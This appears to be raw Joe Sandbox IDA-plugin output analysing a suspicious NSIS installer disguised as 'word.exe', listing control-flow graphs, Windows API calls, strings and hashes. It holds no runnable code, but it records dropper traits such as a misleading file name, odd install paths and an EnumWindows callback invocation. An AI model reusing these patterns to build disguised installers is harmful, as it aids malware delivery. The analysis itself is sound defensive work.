4026df 5480->5482 5481->5479 5497 4031cc SetFilePointer 5482->5497 5483->5484 5486 4026e5 5487 4031b6 ReadFile 5486->5487 5488 4026ee GlobalAlloc 5487->5488 5489 402732 WriteFile GlobalFree 5488->5489 5490 4026fe 5488->5490 5492 402f1f 46 API calls 5489->5492 5491 402f1f 46 API calls 5490->5491 5495 40270b 5491->5495 5493 402757 5492->5493 5493->5481 5494 402729 GlobalFree 5494->5489 5495->5494 5496->5478 5497->5486 5498 404135 5499 40414b 5498->5499 5501 404257 5498->5501 5502 403fec 19 API calls 5499->5502 5500 4042c6 5503 4042d0 GetDlgItem 5500->5503 5504 40439a 5500->5504 5501->5500 5501->5504 5508 40429b GetDlgItem SendMessageA 5501->5508 5505 4041a1 5502->5505 5506 4042e6 5503->5506 5507 404358 5503->5507 5509 404053 8 API calls 5504->5509 5510 403fec 19 API calls 5505->5510 5506->5507 5515 40430c 6 API calls 5506->5515 5507->5504 5511 40436a 5507->5511 5529 40400e EnableWindow 5508->5529 5513 404395 5509->5513 5514 4041ae CheckDlgButton 5510->5514 5516 404370 SendMessageA 5511->5516 5517 404381 5511->5517 5527 40400e EnableWindow 5514->5527 5515->5507 5516->5517 5517->5513 5520 404387 SendMessageA 5517->5520 5518 4042c1 5521 4043bf SendMessageA 5518->5521 5520->5513 5521->5500 5522 4041cc GetDlgItem 5528 404021 SendMessageA 5522->5528 5524 4041e2 SendMessageA 5525 404200 GetSysColor 5524->5525 5526 404209 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5524->5526 5525->5526 5526->5513 5527->5522 5528->5524 5529->5518 4202 402036 4203 4029fd 18 API calls 4202->4203 4204 40203d 4203->4204 4205 4029fd 18 API calls 4204->4205 4206 402047 4205->4206 4207 4029fd 18 API calls 4206->4207 4208 402051 4207->4208 4209 4029fd 18 API calls 4208->4209 4210 40205b 4209->4210 4211 4029fd 18 API calls 4210->4211 4212 402064 4211->4212 4213 40207a CoCreateInstance 4212->4213 4216 4029fd 18 API calls 4212->4216 4214 40214d 4213->4214 4215 402099 4213->4215 4217 401423 25 API calls 4214->4217 4218 402181 4214->4218 4215->4214 4219 40212f MultiByteToWideChar 4215->4219 4216->4213 4217->4218 4219->4214 5530 4014b7 5531 4014bd 5530->5531 5532 401389 2 API calls 5531->5532 5533 4014c5 5532->5533 4638 401bb8 4639 4029e0 18 API calls 4638->4639 4640 401bbf 4639->4640 4641 4029e0 18 API calls 4640->4641 4642 401bc9 4641->4642 4643 401bd9 4642->4643 4644 4029fd 18 API calls 4642->4644 4645 401be9 4643->4645 4646 4029fd 18 API calls 4643->4646 4644->4643 4647 401bf4 4645->4647 4648 401c38 4645->4648 4646->4645 4649 4029e0 18 API calls 4647->4649 4650 4029fd 18 API calls 4648->4650 4651 401bf9 4649->4651 4652 401c3d 4650->4652 4653 4029e0 18 API calls 4651->4653 4654 4029fd 18 API calls 4652->4654 4655 401c02 4653->4655 4656 401c46 FindWindowExA 4654->4656 4657 401c28 SendMessageA 4655->4657 4658 401c0a SendMessageTimeoutA 4655->4658 4659 401c64 4656->4659 4657->4659 4658->4659 4670 40243a 4671 402b07 19 API calls 4670->4671 4672 402444 4671->4672 4673 4029e0 18 API calls 4672->4673 4674 40244d 4673->4674 4675 402457 4674->4675 4679 402663 4674->4679 4676 402470 RegEnumValueA 4675->4676 4677 402464 RegEnumKeyA 4675->4677 4678 402489 RegCloseKey 4676->4678 4676->4679 4677->4678 4678->4679 4681 40223b 4682 402243 4681->4682 4683 402249 4681->4683 4684 4029fd 18 API calls 4682->4684 4685 402259 4683->4685 4686 4029fd 18 API calls 4683->4686 4684->4683 4687 402267 4685->4687 4689 4029fd 18 API calls 4685->4689 4686->4685 4688 4029fd 18 API calls 4687->4688 4690 402270 WritePrivateProfileStringA 4688->4690 4689->4687 4715 40173f 4716 4029fd 18 API calls 4715->4716 4717 401746 4716->4717 4718 401764 4717->4718 4719 40176c 4717->4719 4755 405cf1 lstrcpynA 4718->4755 4756 405cf1 lstrcpynA 4719->4756 4722 40176a 4725 405f5c 5 API calls 4722->4725 4723 401777 4724 405781 3 API calls 4723->4724 4726 40177d lstrcatA 4724->4726 4739 401789 4725->4739 4726->4722 4727 405ff5 2 API calls 4727->4739 4728 4017ca 4729 40595d 2 API calls 4728->4729 4729->4739 4731 4017a0 CompareFileTime 4731->4739 4732 401864 4733 404fdc 25 API calls 4732->4733 4735 40186e 4733->4735 4734 405cf1 lstrcpynA 4734->4739 4737 402f1f 46 API calls 4735->4737 4736 404fdc 25 API calls 4743 401850 4736->4743 4738 401881 4737->4738 4740 401895 SetFileTime 4738->4740 4742 4018a7 CloseHandle 4738->4742 4739->4727 4739->4728 4739->4731 4739->4732 4739->4734 4741 405d13 18 API calls 4739->4741 4750 405505 MessageBoxIndirectA 4739->4750 4753 40183b 4739->4753 4754 405982 GetFileAttributesA CreateFileA 4739->4754 4740->4742 4741->4739 4742->4743 4744 4018b8 4742->4744 4745 4018d0 4744->4745 4746 4018bd 4744->4746 4747 405d13 18 API calls 4745->4747 4748 405d13 18 API calls 4746->4748 4749 4018d8 4747->4749 4751 4018c5 lstrcatA 4748->4751 4752 405505 MessageBoxIndirectA 4749->4752 4750->4739 4751->4749 4752->4743 4753->4736 4753->4743 4754->4739 4755->4722 4756->4723 5541 40163f 5542 4029fd 18 API calls 5541->5542 5543 401645 5542->5543 5544 405ff5 2 API calls 5543->5544 5545 40164b 5544->5545 5546 40193f 5547 4029e0 18 API calls 5546->5547 5548 401946 5547->5548 5549 4029e0 18 API calls 5548->5549 5550 401950 5549->5550 5551 4029fd 18 API calls 5550->5551 5552 401959 5551->5552 5553 40196c lstrlenA 5552->5553 5555 4019a7 5552->5555 5554 401976 5553->5554 5554->5555 5559 405cf1 lstrcpynA 5554->5559 5557 401990 5557->5555 5558 40199d lstrlenA 5557->5558 5558->5555 5559->5557

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 403217-4032ae #17 SetErrorMode OleInitialize call 40601c SHGetFileInfoA call 405cf1 GetCommandLineA call 405cf1 GetModuleHandleA 7 4032b0-4032b5 0->7 8 4032ba-4032cf call 4057ac CharNextA 0->8 7->8 11 403394-403398 8->11 12 4032d4-4032d7 11->12 13 40339e 11->13 14 4032d9-4032dd 12->14 15 4032df-4032e7 12->15 16 4033b1-4033cb GetTempPathA call 4031e3 13->16 14->14 14->15 17 4032e9-4032ea 15->17 18 4032ef-4032f2 15->18 26 403423-40343d DeleteFileA call 402c79 16->26 27 4033cd-4033eb GetWindowsDirectoryA lstrcatA call 4031e3 16->27 17->18 20 403384-403391 call 4057ac 18->20 21 4032f8-4032fc 18->21 20->11 36 403393 20->36 24 403314-403341 21->24 25 4032fe-403304 21->25 32 403343-403349 24->32 33 403354-403382 24->33 30 403306-403308 25->30 31 40330a 25->31 42 4034d1-4034e0 call 403695 OleUninitialize 26->42 43 403443-403449 26->43 27->26 41 4033ed-40341d GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4031e3 27->41 30->24 30->31 31->24 38 40334b-40334d 32->38 39 40334f 32->39 33->20 35 4033a0-4033ac call 405cf1 33->35 35->16 36->11 38->33 38->39 39->33 41->26 41->42 55 4034e6-4034f6 call 405505 ExitProcess 42->55 56 4035da-4035e0 42->56 46 4034c1-4034c8 call 403787 43->46 47 40344b-403456 call 4057ac 43->47 53 4034cd 46->53 59 403458-403481 47->59 60 40348c-403496 47->60 53->42 57 4035e6-403603 call 40601c * 3 56->57 58 40367d-403685 56->58 89 403605-403607 57->89 90 40364d-40365b call 40601c 57->90 62 403687 58->62 63 40368b-40368f ExitProcess 58->63 65 403483-403485 59->65 66 403498-4034a5 call 40586f 60->66 67 4034fc-403516 lstrcatA lstrcmpiA 60->67 62->63 65->60 71 403487-40348a 65->71 66->42 77 4034a7-4034bd call 405cf1 * 2 66->77 67->42 69 403518-40352d CreateDirectoryA SetCurrentDirectoryA 67->69 74 40353a-403562 call 405cf1 69->74 75 40352f-403535 call 405cf1 69->75 71->60 71->65 85 403568-403584 call 405d13 DeleteFileA 74->85 75->74 77->46 96 4035c5-4035cc 85->96 97 403586-403596 CopyFileA 85->97 89->90 94 403609-40360b 89->94 101 403669-403674 ExitWindowsEx 90->101 102 40365d-403667 90->102 94->90 95 40360d-40361f GetCurrentProcess 94->95 95->90 107 403621-403643 95->107 96->85 99 4035ce-4035d5 call 405ba5 96->99 97->96 100 403598-4035b8 call 405ba5 call 405d13 call 4054a4 97->100 99->42 100->96 117 4035ba-4035c1 CloseHandle 100->117 101->58 106 403676-403678 call 40140b 101->106 102->101 102->106 106->58 107->90 117->96
                                                          APIs
                                                          • #17.COMCTL32 ref: 00403238
                                                          • SetErrorMode.KERNELBASE(00008001), ref: 00403243
                                                          • OleInitialize.OLE32(00000000), ref: 0040324A
                                                            • Part of subcall function 0040601C: GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000009), ref: 0040602E
                                                            • Part of subcall function 0040601C: LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000009), ref: 00406039
                                                            • Part of subcall function 0040601C: GetProcAddress.KERNEL32(00000000,?), ref: 0040604A
                                                          • SHGetFileInfoA.SHELL32(0041ECB8,00000000,?,?,00000000,00000009), ref: 00403272
                                                            • Part of subcall function 00405CF1: lstrcpynA.KERNEL32(?,?,00000400,00403287,00422F00,NSIS Error), ref: 00405CFE
                                                          • GetCommandLineA.KERNEL32(00422F00,NSIS Error), ref: 00403287
                                                          • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\word.exe",00000000), ref: 0040329A
                                                          • CharNextA.USER32(00000000,"C:\Users\user\Desktop\word.exe",00000020), ref: 004032C5
                                                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004033C2
                                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004033D3
                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033DF
                                                          • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033F3
                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004033FB
                                                          • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040340C
                                                          • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403414
                                                          • DeleteFileA.KERNELBASE(1033), ref: 00403428
                                                          • OleUninitialize.OLE32(?), ref: 004034D6
                                                          • ExitProcess.KERNEL32 ref: 004034F6
                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\word.exe",00000000,?), ref: 00403502
                                                          • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 0040350E
                                                          • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040351A
                                                          • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403521
                                                          • DeleteFileA.KERNEL32(0041E8B8,0041E8B8,?,user32::EnumWindows(i r1 ,i 0),?), ref: 0040357A
                                                          • CopyFileA.KERNEL32(C:\Users\user\Desktop\word.exe,0041E8B8,00000001), ref: 0040358E
                                                          • CloseHandle.KERNEL32(00000000,0041E8B8,0041E8B8,?,0041E8B8,00000000), ref: 004035BB
                                                          • GetCurrentProcess.KERNEL32(?,?,00000006,00000005,?), ref: 00403614
                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 0040366C
                                                          • ExitProcess.KERNEL32 ref: 0040368F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                          • String ID: "$"C:\Users\user\Desktop\word.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\word.exe$C:\Users\user\spherosome\preadoption\preembodiment$C:\Users\user\spherosome\preadoption\preembodiment\Himlede$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$`KYw$user32::EnumWindows(i r1 ,i 0)$~nsu.tmp
                                                          • API String ID: 4107622049-1750502713
                                                          • Opcode ID: 7fa4d376e80a765003bfd3befb9d552c5c4fbafe01cf9df5d54f5772ac0bf63e
                                                          • Instruction ID: a1c447b546bb562fff2a187ff51308e62fc677b1bbcaaf8e03341a31a96d3340
                                                          • Opcode Fuzzy Hash: 7fa4d376e80a765003bfd3befb9d552c5c4fbafe01cf9df5d54f5772ac0bf63e
                                                          • Instruction Fuzzy Hash: DFB1F570608351BAE7216F619C8DA2B3EA89B45706F04443FF541BA2D2C77C9E01CB6E

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 260 405d13-405d1e 261 405d20-405d2f 260->261 262 405d31-405d46 260->262 261->262 263 405f39-405f3d 262->263 264 405d4c-405d57 262->264 265 405f43-405f4d 263->265 266 405d69-405d73 263->266 264->263 267 405d5d-405d64 264->267 268 405f58-405f59 265->268 269 405f4f-405f53 call 405cf1 265->269 266->265 270 405d79-405d80 266->270 267->263 269->268 272 405d86-405dbb 270->272 273 405f2c 270->273 274 405dc1-405dcc GetVersion 272->274 275 405ed6-405ed9 272->275 276 405f36-405f38 273->276 277 405f2e-405f34 273->277 280 405de6 274->280 281 405dce-405dd2 274->281 278 405f09-405f0c 275->278 279 405edb-405ede 275->279 276->263 277->263 286 405f1a-405f2a lstrlenA 278->286 287 405f0e-405f15 call 405d13 278->287 283 405ee0-405eec call 405c4f 279->283 284 405eee-405efa call 405cf1 279->284 285 405ded-405df4 280->285 281->280 282 405dd4-405dd8 281->282 282->280 288 405dda-405dde 282->288 298 405eff-405f05 283->298 284->298 290 405df6-405df8 285->290 291 405df9-405dfb 285->291 286->263 287->286 288->280 294 405de0-405de4 288->294 290->291 296 405e34-405e37 291->296 297 405dfd-405e18 call 405bd8 291->297 294->285 301 405e47-405e4a 296->301 302 405e39-405e45 GetSystemDirectoryA 296->302 305 405e1d-405e20 297->305 298->286 300 405f07 298->300 306 405ece-405ed4 call 405f5c 300->306 303 405eb4-405eb6 301->303 304 405e4c-405e5a GetWindowsDirectoryA 301->304 307 405eb8-405ebb 302->307 303->307 308 405e5c-405e66 303->308 304->303 309 405e26-405e2f call 405d13 305->309 310 405ebd-405ec1 305->310 306->286 307->306 307->310 312 405e80-405e96 SHGetSpecialFolderLocation 308->312 313 405e68-405e6b 308->313 309->307 310->306 315 405ec3-405ec9 lstrcatA 310->315 318 405eb1 312->318 319 405e98-405eaf SHGetPathFromIDListA CoTaskMemFree 312->319 313->312 317 405e6d-405e74 313->317 315->306 321 405e7c-405e7e 317->321 318->303 319->307 319->318 321->307 321->312
                                                          APIs
                                                          • GetVersion.KERNEL32(?,0041F4D8,00000000,00405014,0041F4D8,00000000), ref: 00405DC4
                                                          • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405E3F
                                                          • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405E52
                                                          • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405E8E
                                                          • SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00405E9C
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00405EA7
                                                          • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405EC9
                                                          • lstrlenA.KERNEL32(Call,?,0041F4D8,00000000,00405014,0041F4D8,00000000), ref: 00405F1B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                          • String ID: +/R$Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$user32::EnumWindows(i r1 ,i 0)
                                                          • API String ID: 900638850-1873685383
                                                          • Opcode ID: 61e6d1e2250e956bb5bd6cc292287568ebfec5cbdb9a83a556c9a0d1fe3f13fc
                                                          • Instruction ID: c546ec396b89b09005d3c5f1d9b4a4bf58d4ceda60e07cc515ef6374c73a2cb0
                                                          • Opcode Fuzzy Hash: 61e6d1e2250e956bb5bd6cc292287568ebfec5cbdb9a83a556c9a0d1fe3f13fc
                                                          • Instruction Fuzzy Hash: 07610471A04A02AAEF216F64DC847BF3B64DB51305F50813BE941B62D1D37C8A42DF9E

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 522 4055b1-4055d7 call 40586f 525 4055f0-4055f7 522->525 526 4055d9-4055eb DeleteFileA 522->526 528 4055f9-4055fb 525->528 529 40560a-40561a call 405cf1 525->529 527 40577a-40577e 526->527 530 405601-405604 528->530 531 405728-40572d 528->531 537 405629-40562a call 4057c8 529->537 538 40561c-405627 lstrcatA 529->538 530->529 530->531 531->527 533 40572f-405732 531->533 535 405734-40573a 533->535 536 40573c-405744 call 405ff5 533->536 535->527 536->527 546 405746-40575a call 405781 call 405569 536->546 541 40562f-405632 537->541 538->541 542 405634-40563b 541->542 543 40563d-405643 lstrcatA 541->543 542->543 545 405648-405666 lstrlenA FindFirstFileA 542->545 543->545 547 40566c-405683 call 4057ac 545->547 548 40571e-405722 545->548 558 405772-405775 call 404fdc 546->558 559 40575c-40575f 546->559 555 405685-405689 547->555 556 40568e-405691 547->556 548->531 550 405724 548->550 550->531 555->556 560 40568b 555->560 561 405693-405698 556->561 562 4056a4-4056b2 call 405cf1 556->562 558->527 559->535 563 405761-405770 call 404fdc call 405ba5 559->563 560->556 565 40569a-40569c 561->565 566 4056fd-40570f FindNextFileA 561->566 572 4056b4-4056bc 562->572 573 4056c9-4056d4 call 405569 562->573 563->527 565->562 571 40569e-4056a2 565->571 566->547 570 405715-405718 FindClose 566->570 570->548 571->562 571->566 572->566 575 4056be-4056c7 call 4055b1 572->575 582 4056f5-4056f8 call 404fdc 573->582 583 4056d6-4056d9 573->583 575->566 582->566 585 4056db-4056eb call 404fdc call 405ba5 583->585 586 4056ed-4056f3 583->586 585->566 586->566
                                                          APIs
                                                          • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,77582EE0,00000000), ref: 004055DA
                                                          • lstrcatA.KERNEL32(00420D00,\*.*,00420D00,?,?,C:\Users\user\AppData\Local\Temp\,77582EE0,00000000), ref: 00405622
                                                          • lstrcatA.KERNEL32(?,00409014,?,00420D00,?,?,C:\Users\user\AppData\Local\Temp\,77582EE0,00000000), ref: 00405643
                                                          • lstrlenA.KERNEL32(?,?,00409014,?,00420D00,?,?,C:\Users\user\AppData\Local\Temp\,77582EE0,00000000), ref: 00405649
                                                          • FindFirstFileA.KERNEL32(00420D00,?,?,?,00409014,?,00420D00,?,?,C:\Users\user\AppData\Local\Temp\,77582EE0,00000000), ref: 0040565A
                                                          • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405707
                                                          • FindClose.KERNEL32(00000000), ref: 00405718
                                                          Strings
                                                          • "C:\Users\user\Desktop\word.exe", xrefs: 004055B1
                                                          • \*.*, xrefs: 0040561C
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004055BF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: "C:\Users\user\Desktop\word.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                          • API String ID: 2035342205-1750612876
                                                          • Opcode ID: 22969863301cb19216d051acf74f02a24dce50bcb235e6d7d36d73776f663258
                                                          • Instruction ID: 987af563c2c121d98d0664262626d3ce0c78e9a6bdf03ff904ac809f9c790c88
                                                          • Opcode Fuzzy Hash: 22969863301cb19216d051acf74f02a24dce50bcb235e6d7d36d73776f663258
                                                          • Instruction Fuzzy Hash: 0F51CF70800A44BADF216A629C45BBF7AB8DF42754F54803BF445B21D2D73C9942EF6E

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 672 401f68-401f74 673 401f7a-401f90 call 4029fd * 2 672->673 674 40202f-402031 672->674 683 401f92-401f9d GetModuleHandleA 673->683 684 401f9f-401fad LoadLibraryExA 673->684 676 40217c-402181 call 401423 674->676 681 402892-4028a1 676->681 683->684 686 401faf-401fbc GetProcAddress 683->686 684->686 687 402028-40202a 684->687 689 401ffb-402000 call 404fdc 686->689 690 401fbe-401fc4 686->690 687->676 694 402005-402008 689->694 692 401fc6-401fd2 call 401423 690->692 693 401fdd-401ff4 call 100016bd 690->693 692->694 702 401fd4-401fdb 692->702 696 401ff6-401ff9 693->696 694->681 697 40200e-402016 call 403727 694->697 696->694 697->681 703 40201c-402023 FreeLibrary 697->703 702->694 703->681
                                                          APIs
                                                          • GetModuleHandleA.KERNELBASE(00000000,00000001,?), ref: 00401F93
                                                            • Part of subcall function 00404FDC: lstrlenA.KERNEL32(0041F4D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405015
                                                            • Part of subcall function 00404FDC: lstrlenA.KERNEL32(00402C51,0041F4D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405025
                                                            • Part of subcall function 00404FDC: lstrcatA.KERNEL32(0041F4D8,00402C51,00402C51,0041F4D8,00000000,00000000,00000000), ref: 00405038
                                                            • Part of subcall function 00404FDC: SetWindowTextA.USER32(0041F4D8,0041F4D8), ref: 0040504A
                                                            • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405070
                                                            • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040508A
                                                            • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098
                                                          • LoadLibraryExA.KERNELBASE(00000000,?,?,00000001,?), ref: 00401FA3
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
                                                          • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,?,00000001,?), ref: 0040201D
                                                          Strings
                                                          • user32::EnumWindows(i r1 ,i 0), xrefs: 00401FE7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                          • String ID: user32::EnumWindows(i r1 ,i 0)
                                                          • API String ID: 2987980305-797600110
                                                          • Opcode ID: 6a4779d3db91ae85148ae6d6eeeaf7d80a6810b4983c01acf47586cbbec28c98
                                                          • Instruction ID: 3f2733cfc3de05a67066b1a81d0209d8d10e728cfd6e940428cc792ad37f86ee
                                                          • Opcode Fuzzy Hash: 6a4779d3db91ae85148ae6d6eeeaf7d80a6810b4983c01acf47586cbbec28c98
                                                          • Instruction Fuzzy Hash: 9A21EB72904215BBCF10BFA4CE4DA6E79B0AB44358F60823BF601B62D1D7BD4D41EA5E
                                                          APIs
                                                          • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,?,00000045,000000CD,00000002,000000DF,?), ref: 0040208B
                                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407374,?,?), ref: 00402143
                                                          Strings
                                                          • C:\Users\user\spherosome\preadoption\preembodiment\Himlede, xrefs: 004020CB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
